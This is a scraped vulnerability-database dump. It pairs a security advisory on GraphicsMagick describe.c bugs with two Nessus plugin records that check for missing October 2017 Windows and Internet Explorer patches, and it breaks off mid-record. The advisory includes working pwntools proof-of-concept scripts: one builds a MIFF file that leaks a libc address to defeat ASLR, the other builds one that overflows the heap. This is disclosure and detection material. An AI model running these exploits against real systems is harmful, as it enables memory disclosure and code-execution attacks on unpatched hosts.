ftp://ftp.graphicsmagick.org/pub/GraphicsMagick/snapshots/ChangeLog.txt \n \n \nVulnerabilities details \n \nMemory Information Disclosure \nGraphicsMagick is vulnerable to a memory information disclosure vulnerability found in DescribeImage function of the magick/describe.c file. \n \nThe portion of the code containing the vulnerability responsible of printing the IPTC Profile information contained in the image. \n \nThis vulnerability can be triggered with a specially crafted MIFF file. \n \nThe code which triggers the vulnerable code path is: \n \n63 MagickExport MagickPassFail DescribeImage(Image *image,FILE *file, \n64 const MagickBool verbose) \n65 { \n... \n660 for (i=0; i < profile_length; ) \n661 { \n662 if (profile[i] != 0x1c) \n663 { \n664 i++; \n665 continue; \n666 } \n667 i++; /* skip file separator */ \n668 i++; /* skip record number */ \n... \n725 i++; \n726 (void) fprintf(file,\" %.1024s:\\n\",tag); \n727 length=profile[i++] << 8; \n728 length|=profile[i++]; \n729 text=MagickAllocateMemory(char *,length+1); \n730 if (text != (char *) NULL) \n731 { \n732 char \n733 **textlist; \n734 \n735 register unsigned long \n736 j; \n737 \n738 (void) strncpy(text,(char *) profile+i,length); \n739 text[length]='\\0'; \n740 textlist=StringToList(text); \n741 if (textlist != (char **) NULL) \n742 { \n743 for (j=0; textlist[j] != (char *) NULL; j++) \n744 { \n745 (void) fprintf(file,\" %s\\n\",textlist[j]); \n... \n752 i+=length; \n753 } \n \n \nThe value in profile_length variable is set in the following field in the MIFF header: profile-iptc=8 \n \nThere is an out-of-bounds buffer dereference whenever profile[i] is accessed because the increments of i is never checked. \n \nIf we break on line 738 of describe.c, we can explore what is present on the heap during the strncpy operation. \n \n \ngefa$? x/2xg profile \n0x8be210: 0x08000a001c414141 0x00007ffff690fba8 \n \n \nThe 8 bytes 0x08000a001c414141 is the profile payload present in the specially crafted MIFF file. \n \n \n41 41 41 - padding \n1C - sentinel check in line 662 \n00 - padding \n0A - \"Priority\" tag \n08 00 - 8 in big endian, the length \n \n \nIf we examine the value 0x00007ffff690fba8 adjacent to the payload, it becomes apparent that it is an address within the main_arena struct in libc. \n \n \ngefa$? x/xw 0x00007ffff690fba8 \n0x7ffff690fba8 <main_arena+136>: 0x008cdc40 \ngefa$? vmmap libc \nStart End Offset Perm Path \n0x00007ffff654b000 0x00007ffff670b000 0x0000000000000000 r-x \n/lib/x86_64-linux-gnu/libc-2.23.so \n0x00007ffff670b000 0x00007ffff690b000 0x00000000001c0000 --- \n/lib/x86_64-linux-gnu/libc-2.23.so \n0x00007ffff690b000 0x00007ffff690f000 0x00000000001c0000 r-- \n/lib/x86_64-linux-gnu/libc-2.23.so \n0x00007ffff690f000 0x00007ffff6911000 0x00000000001c4000 rw- \n/lib/x86_64-linux-gnu/libc-2.23.so \n \nNow we can calculate the offset to libc base a 0x3c4b98 \n \nProof of Concept \n \n$ python miff/readexploit.py \n[+] Starting local process a/usr/bin/gma: pid 20019 \n[+] Receiving all data: Done (1.27KB) \n[*] Process a/usr/bin/gma stopped with exit code 0 (pid 20019) \n[*] Main Arena Leak: 0x7f72948adb98 \n[*] libc Base: 0x7f72944e9000 \n \n#!/usr/bin/python \n# GraphicsMagick IPTC Profile libc Leak \n \nfrom pwn import * \n \ndirectory = \"DIR\" \npartitions = ('id=ImageMagick version=1.0\\nclass=DirectClass matte=False\\n' + \n'columns=1 rows=1 depth=16\\nscene=1\\nmontage=1x1+0+0\\nprofil' + \n'e-iptc=', \n'\\n\\x0c\\n:\\x1a', \n'\\n\\x00', \n'\\n\\x00\\xbe\\xbe\\xbe\\xbe\\xbe\\xbe\\n') \noutput = \"readexploit.miff\" \nlength = 8 \n \n#libc_main_arena_entry_offset = 0x3c4ba8 \nlibc_main_arena_entry_offset = 0x3c4b98 \n \ndef main(): \ndata = \"AAA\" + \"\\x1c\" + \"\\x00\" + chr(10) + p16(0x8, endian=\"big\") \nheader = partitions[0] + str(length) + partitions[1] \npayload = header + directory + partitions[2] + data + partitions[3] \nfile(output, \"w\").write(payload) \n \np = process(executable=\"gm\", argv=[\"identify\", \"-verbose\", output]) \noutput_leak = p.recvall() \npriority_offset = output_leak.index(\"Priority:\") + 12 \nmontage_offset = output_leak.index(\"Montage:\") - 3 \nleak = output_leak[priority_offset:montage_offset] \nif \"0x00000000\" in leak: \nlog.info(\"Unlucky run. Value corrupted by StringToList\") \nexit() \nmain_arena_leak = u64(leak.ljust(8, \"\\x00\")) \nlog.info(\"Main Arena Leak: 0x%x\" % main_arena_leak) \nlibc_base = main_arena_leak - libc_main_arena_entry_offset \nlog.info(\"libc Base: 0x%x\" % libc_base) \n \nif __name__ == \"__main__\": \nmain() \n \n \nHeap Overflow \nGraphicsMagick is vulnerable to a heap overflow vulnerability found in DescribeImage() function of the magick/describe.c file. \n \nThe call to strncpy on line 855 does not limit the size to be copied to the size of the buffer copied to. Instead, the size is calculated by searching for a newline or a null byte in the directory name. \n \n844 /* \n845 Display visual image directory. \n846 */ \n847 image_info=CloneImageInfo((ImageInfo *) NULL); \n848 (void) CloneString(&image_info->size,\"64x64\"); \n849 (void) fprintf(file,\" Directory:\\n\"); \n850 for (p=image->directory; *p != '\\0'; p++) \n851 { \n852 q=p; \n853 while ((*q != '\\n') && (*q != '\\0')) \n854 q++; \n855 (void) strncpy(image_info->filename,p,q-p); \n856 image_info->filename[q-p]='\\0'; \n857 p=q; \n... \n880 } \n881 DestroyImageInfo(image_info); \n \nSince the field filename in the ImageInfo struct has the static size of 2053, the heap can be corrupted by forging an overly long directory name. \n \n \ntype = struct _ImageInfo { \n... \nFILE *file; \nchar magick[2053]; \nchar filename[2053]; \n_CacheInfoPtr_ cache; \nvoid *definitions; \nImage *attributes; \nunsigned int ping; \nPreviewType preview_type; \nunsigned int affirm; \n_BlobInfoPtr_ blob; \nsize_t length; \nchar unique[2053]; \nchar zero[2053]; \nunsigned long signature; \n} \n \nOne possible way to trigger the vulnerability is to run the identify command on a specially crafted MIFF format file with the verbose flag. \n \nProof of Concept \nThe following proof of concept script will generate a specially crafted MIFF file exploit.miff. \n''' \n \n#!/usr/bin/python \n \nfrom pwn import * \n \npartitions = ('id=ImageMagick version=1.0\\nclass=DirectClass matte=False\\n' + \n'columns=1 rows=1 depth=16\\nscene=1\\nmontage=1x1+0+0\\n\\x0c\\n' + \n':\\x1a', \n'\\n\\x00\\xbe\\xbe\\xbe\\xbe\\xbe\\xbe\\n') \noutput = \"exploit.miff\" \n \ndef main(): \npayload = \"A\"*10000 \npayload = partitions[0] + payload + partitions[1] \nfile(output, \"w\").write(payload) \n \nif __name__ == \"__main__\": \nmain() \n \n''' \nRunning the GraphicsMagick gm utility with the arguments identify -verbose in GDB and breaking after the vulnerable strncpy call, and examining the corrupted ImageInfo object demonstrates that the heap corruption was successful. \n \n \ngefa$? r identify -verbose exploit.miff \n... \ngefa$? br describe.c:856 \nBreakpoint 1 at 0x4571df: file magick/describe.c, line 856. \n... \ngefa$? p *image_info \n$3 = { \n... \ncompression = UndefinedCompression, \nfile = 0x0, \nmagick = '\\000' <repeats 2052 times>, \nfilename = 'A' <repeats 2053 times>, \ncache = 0x4141414141414141, \ndefinitions = 0x4141414141414141, \nattributes = 0x4141414141414141, \nping = 0x41414141, \npreview_type = 1094795585, \naffirm = 0x41414141, \nblob = 0x4141414141414141, \nlength = 0x4141414141414141, \nunique = 'A' <repeats 2053 times>, \nzero = 'A' <repeats 2053 times>, \nsignature = 0x4141414141414141 \n} \n''' \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/144878/graphicsmagick-discloseoverflow.txt"}], "nessus": [{"lastseen": "2019-02-21T01:34:07", "bulletinFamily": "scanner", "description": "The Internet Explorer installation on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11813, CVE-2017-11822)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-11790)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2017-11793, CVE-2017-11810)", "modified": "2018-08-03T00:00:00", "id": "SMB_NT_MS17_OCT_INTERNET_EXPLORER.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=104895", "published": "2017-11-30T00:00:00", "title": "Security Updates for Internet Explorer (October 2017)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104895);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/08/03 11:35:09\");\n\n script_cve_id(\n \"CVE-2017-11790\",\n \"CVE-2017-11793\",\n \"CVE-2017-11810\",\n \"CVE-2017-11813\",\n \"CVE-2017-11822\"\n );\n script_bugtraq_id(\n 101077,\n 101081,\n 101083,\n 101122,\n 101141\n );\n script_xref(name:\"MSKB\", value:\"4041681\");\n script_xref(name:\"MSKB\", value:\"4041690\");\n script_xref(name:\"MSKB\", value:\"4041693\");\n script_xref(name:\"MSKB\", value:\"4040685\");\n script_xref(name:\"MSFT\", value:\"MS17-4041681\");\n script_xref(name:\"MSFT\", value:\"MS17-4041690\");\n script_xref(name:\"MSFT\", value:\"MS17-4041693\");\n script_xref(name:\"MSFT\", value:\"MS17-4040685\");\n\n script_name(english:\"Security Updates for Internet Explorer (October 2017)\");\n script_summary(english:\"Checks for Microsoft security updates.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Internet Explorer installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Internet Explorer installation on the remote host is\nmissing security updates. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11813,\n CVE-2017-11822)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11790)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11793, CVE-2017-11810)\");\n # https://support.microsoft.com/en-us/help/4041681/windows-7-update-kb4041681\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1d1a2595\");\n # https://support.microsoft.com/en-us/help/4041690/windows-server-2012-update-kb4041690\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e258896f\");\n # https://support.microsoft.com/en-us/help/4041693/windows-81-update-kb4041693\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1c3325f2\");\n # https://support.microsoft.com/en-us/help/4040685/cumulative-security-update-for-internet-explorer\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?86f61c93\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released security updates for the affected versions of Internet Explorer.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\"); \n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-10';\nkbs = make_list(\n '4041681',\n '4041690',\n '4041693',\n '4040685'\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nos = get_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\nif (\"Vista\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 8.1 / Windows Server 2012 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"mshtml.dll\", version:\"11.0.9600.18817\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4040685\") ||\n\n # Windows Server 2012\n # Internet Explorer 10\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"mshtml.dll\", version:\"10.0.9200.22277\", min_version:\"10.0.9200.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4040685\") ||\n\n # Windows 7 / Server 2008 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"mshtml.dll\", version:\"11.0.9600.18817\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4040685\") ||\n\n # Windows Server 2008\n # Internet Explorer 9\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mshtml.dll\", version:\"9.0.8112.21061\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4040685\")\n)\n{\n report = '\\nNote: The fix for this issue is available in either of the following updates:\\n';\n report += ' - KB4040685 : Cumulative Security Update for Internet Explorer\\n';\n if(os == \"6.3\")\n {\n report += ' - KB4041693 : Windows 8.1 / Server 2012 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS17-10', kb:'4041693', report);\n }\n else if(os == \"6.2\")\n {\n report += ' - KB4041690 : Windows Server 2012 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS17-10', kb:'4041690', report);\n }\n else if(os == \"6.1\")\n {\n report += ' - KB4041681 : Windows 7 / Server 2008 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS17-10', kb:'4041681', report);\n }\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:33:19", "bulletinFamily": "scanner", "description": "The remote Windows host is missing multiple security updates released on 2017/10/10. It is, therefore, affected by multiple vulnerabilities :\n\n- A buffer overflow vulnerability exists in the Microsoft JET Database Engine that could allow remote code execution on an affected system. An attacker who successfully exploited this vulnerability could take complete control of an affected system.\n (CVE-2017-0250)\n\n - A remote code execution vulnerability exists when Windows Search handles objects in memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2017-11771)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2017-11824)\n\n - An elevation of privilege vulnerability exists when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2017-8689, CVE-2017-8694)\n\n - A buffer overflow vulnerability exists in the Microsoft JET Database Engine that could allow remote code execution on an affected system. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. (CVE-2017-8717, CVE-2017-8718)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2017-11816)\n\n - An information disclosure vulnerability exists in the way that the Windows SMB Server handles certain requests. An authenticated attacker who successfully exploited this vulnerability could craft a special packet, which could lead to information disclosure from the server. (CVE-2017-11815)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2017-11765, CVE-2017-11814)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2017-11793, CVE-2017-11810)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited the vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2017-11762, CVE-2017-11763)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-11790)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n (CVE-2017-11817)\n\n - A denial of service vulnerability exists in the Microsoft Server Block Message (SMB) when an attacker sends specially crafted requests to the server. An attacker who exploited this vulnerability could cause the affected system to crash. To attempt to exploit this issue, an attacker would need to send specially crafted SMB requests to the target system. Note that the denial of service vulnerability would not allow an attacker to execute code or to elevate their user rights, but it could cause the affected system to stop accepting requests. The security update addresses the vulnerability by correcting the manner in which SMB handles specially crafted client requests.\n (CVE-2017-11781)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11822)\n\n - An Information disclosure vulnerability exists when Windows Search improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-11772)\n\n - A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n (CVE-2017-11780)\n\n - An information disclosure vulnerability exists in the Windows kernel that could allow an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (ASLR) bypass. An attacker who successfully exploited the vulnerability could retrieve the memory address of a kernel object. (CVE-2017-11784, CVE-2017-11785)\n\n - A spoofing vulnerability exists in the Windows implementation of wireless networking. An attacker who successfully exploited this vulnerability could potentially replay broadcast and/or multicast traffic to hosts on a WPA or WPA 2-protected wireless network.\n (CVE-2017-13080)", "modified": "2018-09-17T00:00:00", "id": "SMB_NT_MS17_OCT_WIN2008.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=103816", "published": "2017-10-12T00:00:00", "title": "Windows 2008 October 2017 Multiple Security Updates (KRACK)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103816);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2018/09/17 21:46:53\");\n\n script_cve_id(\n \"CVE-2017-0250\",\n \"CVE-2017-8689\",\n \"CVE-2017-8694\",\n \"CVE-2017-8717\",\n \"CVE-2017-8718\",\n# \"CVE-2017-8727\", # KB 4042123\n \"CVE-2017-11762\",\n \"CVE-2017-11763\",\n \"CVE-2017-11765\",\n \"CVE-2017-11771\",\n \"CVE-2017-11772\",\n \"CVE-2017-11780\",\n \"CVE-2017-11781\",\n \"CVE-2017-11784\",\n \"CVE-2017-11785\",\n \"CVE-2017-11790\",\n \"CVE-2017-11793\",\n \"CVE-2017-11810\",\n \"CVE-2017-11814\",\n \"CVE-2017-11815\",\n \"CVE-2017-11816\",\n \"CVE-2017-11817\",\n \"CVE-2017-11822\",\n \"CVE-2017-11824\",\n \"CVE-2017-13080\"\n );\n script_bugtraq_id(\n 98100,\n 101077,\n 101081,\n 101093,\n 101094,\n 101095,\n 101099,\n 101100,\n 101108,\n 101109,\n 101110,\n 101111,\n 101114,\n 101116,\n 101122,\n 101128,\n 101136,\n 101140,\n 101141,\n# 101142, # KB 4042123\n 101147,\n 101149,\n 101161,\n 101162,\n 101274\n );\n\n# script_xref(name:\"MSKB\", value:\"4042123\");\n# script_xref(name:\"MSFT\", value:\"MS17-4042123\");\n# script_xref(name:\"MSKB\", value:\"4042723\");\n# script_xref(name:\"MSFT\", value:\"MS17-4042723\");\n script_xref(name:\"MSKB\", value:\"4042050\");\n script_xref(name:\"MSFT\", value:\"MS17-4042050\");\n script_xref(name:\"MSKB\", value:\"4041671\");\n script_xref(name:\"IAVA\", value:\"2017-A-0310\");\n script_xref(name:\"MSFT\", value:\"MS17-4041671\");\n script_xref(name:\"MSKB\", value:\"4041944\");\n script_xref(name:\"MSFT\", value:\"MS17-4041944\");\n script_xref(name:\"MSKB\", value:\"4041995\");\n script_xref(name:\"MSFT\", value:\"MS17-4041995\");\n script_xref(name:\"MSKB\", value:\"4050795\");\n script_xref(name:\"MSFT\", value:\"MS17-4050795\");\n script_xref(name:\"MSKB\", value:\"4042067\");\n script_xref(name:\"MSFT\", value:\"MS17-4042067\");\n script_xref(name:\"MSKB\", value:\"4042120\");\n script_xref(name:\"MSFT\", value:\"MS17-4042120\");\n script_xref(name:\"MSKB\", value:\"4042121\");\n script_xref(name:\"MSFT\", value:\"MS17-4042121\");\n script_xref(name:\"MSKB\", value:\"4042122\");\n script_xref(name:\"MSFT\", value:\"MS17-4042122\");\n\n script_name(english:\"Windows 2008 October 2017 Multiple Security Updates (KRACK)\");\n script_summary(english:\"Checks the existence of Windows Server 2008 October 2017 Patches.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing multiple security updates released\non 2017/10/10. It is, therefore, affected by multiple\nvulnerabilities :\n\n- A buffer overflow vulnerability exists in the Microsoft JET\n Database Engine that could allow remote code execution on an\n affected system. An attacker who successfully exploited this\n vulnerability could take complete control of an affected system.\n (CVE-2017-0250)\n\n - A remote code execution vulnerability exists when\n Windows Search handles objects in memory. An attacker\n who successfully exploited this vulnerability could take\n control of the affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2017-11771)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2017-11824)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel-mode driver fails to properly handle\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2017-8689, CVE-2017-8694)\n\n - A buffer overflow vulnerability exists in the Microsoft\n JET Database Engine that could allow remote code\n execution on an affected system. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. (CVE-2017-8717,\n CVE-2017-8718)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-11816)\n\n - An information disclosure vulnerability exists in the\n way that the Windows SMB Server handles certain\n requests. An authenticated attacker who successfully\n exploited this vulnerability could craft a special\n packet, which could lead to information disclosure from\n the server. (CVE-2017-11815)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11765, CVE-2017-11814)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11793, CVE-2017-11810)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-11762,\n CVE-2017-11763)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11790)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11817)\n\n - A denial of service vulnerability exists in the\n Microsoft Server Block Message (SMB) when an attacker\n sends specially crafted requests to the server. An\n attacker who exploited this vulnerability could cause\n the affected system to crash. To attempt to exploit this\n issue, an attacker would need to send specially crafted\n SMB requests to the target system. Note that the denial\n of service vulnerability would not allow an attacker to\n execute code or to elevate their user rights, but it\n could cause the affected system to stop accepting\n requests. The security update addresses the\n vulnerability by correcting the manner in which SMB\n handles specially crafted client requests.\n (CVE-2017-11781)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11822)\n\n - An Information disclosure vulnerability exists when\n Windows Search improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11772)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2017-11780)\n\n - An information disclosure vulnerability exists in the\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (ASLR) bypass. An attacker who\n successfully exploited the vulnerability could retrieve\n the memory address of a kernel object. (CVE-2017-11784,\n CVE-2017-11785)\n\n - A spoofing vulnerability exists in the Windows\n implementation of wireless networking. An attacker who\n successfully exploited this vulnerability could\n potentially replay broadcast and/or multicast traffic\n to hosts on a WPA or WPA 2-protected wireless network.\n (CVE-2017-13080)\n\");\n # https://support.microsoft.com/en-us/help/4042050/security-update-for-the-microsoft-jet-database-engine-remote-code-exec\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?47cf0955\");\n # https://support.microsoft.com/en-us/help/4050795/unexpected-error-from-external-database-driver-error-when-you-create-o\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9ef65f13\");\n # https://support.microsoft.com/en-us/help/4041995/security-update-for-the-windows-smb-vulnerabilities-in-windows-server\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cdb3c598\");\n # https://support.microsoft.com/en-us/help/4042067/security-update-for-search-vulnerabilities-in-windows-server-2008\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?492474c1\");\n # https://support.microsoft.com/en-us/help/4041671/security-update-for-the-windows-kernel-information-disclosure-vulnerab\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?11033575\");\n # https://support.microsoft.com/en-us/help/4042122/security-update-for-vulnerabilities-in-windows-server-2008\n script_set_attribute(attribute:\"see_also\", 